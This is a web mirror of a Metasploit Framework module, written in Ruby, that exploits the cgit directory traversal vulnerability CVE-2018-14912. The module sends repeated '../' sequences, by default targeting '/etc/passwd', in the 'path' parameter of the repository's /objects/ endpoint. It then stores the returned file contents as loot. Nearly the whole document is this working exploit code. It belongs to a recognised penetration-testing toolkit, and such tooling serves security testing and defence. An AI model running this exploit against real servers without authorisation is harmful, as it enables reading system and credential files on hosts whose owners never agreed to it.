Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/scanner/http/cgit_traversal.rb
19591 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::HttpClient

8
  include Msf::Auxiliary::Report

9
  include Msf::Auxiliary::Scanner

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'cgit Directory Traversal',

16
        'Description' => %q{

17
          This module exploits a directory traversal vulnerability which

18
          exists in cgit < 1.2.1 cgit_clone_objects(), reachable when the

19
          configuration flag enable-http-clone is set to 1 (default).

20
        },

21
        'References' => [

22
          ['CVE', '2018-14912'],

23
          ['URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1627'],

24
          ['EDB', '45148']

25
        ],

26
        'Author' => [

27
          'Google Project Zero', # Vulnerability discovery

28
          'Dhiraj Mishra' # Metasploit module

29
        ],

30
        'DisclosureDate' => '2018-08-03',

31
        'License' => MSF_LICENSE,

32
        'Notes' => {

33
          'Reliability' => UNKNOWN_RELIABILITY,

34
          'Stability' => UNKNOWN_STABILITY,

35
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

36
        }

37
      )

38
    )

39


40
    register_options(

41
      [

42
        OptString.new('FILEPATH', [true, "The path to the file to read", '/etc/passwd']),

43
        OptString.new('TARGETURI', [true, "The base URI path of the cgit install", '/cgit/']),

44
        OptString.new('REPO', [true, "Git repository on the remote server", '']),

45
        OptInt.new('DEPTH', [ true, 'Depth for Path Traversal', 10 ])

46
      ]

47
    )

48
  end

49


50
  def run_host(ip)

51
    filename = datastore['FILEPATH']

52
    traversal = "../" * datastore['DEPTH'] << filename

53


54
    res = send_request_cgi({

55
      'method' => 'GET',

56
      'uri' => normalize_uri(target_uri.path, datastore['REPO'], '/objects/'),

57
      'vars_get' => { 'path' => traversal }

58
    })

59


60
    unless res && res.code == 200

61
      print_error('Nothing was downloaded')

62
      return

63
    end

64


65
    vprint_good("#{peer} - \n#{res.body}")

66
    path = store_loot(

67
      'cgit.traversal',

68
      'text/plain',

69
      ip,

70
      res.body,

71
      filename

72
    )

73
    print_good("File saved in: #{path}")

74
  end

75
end

76


77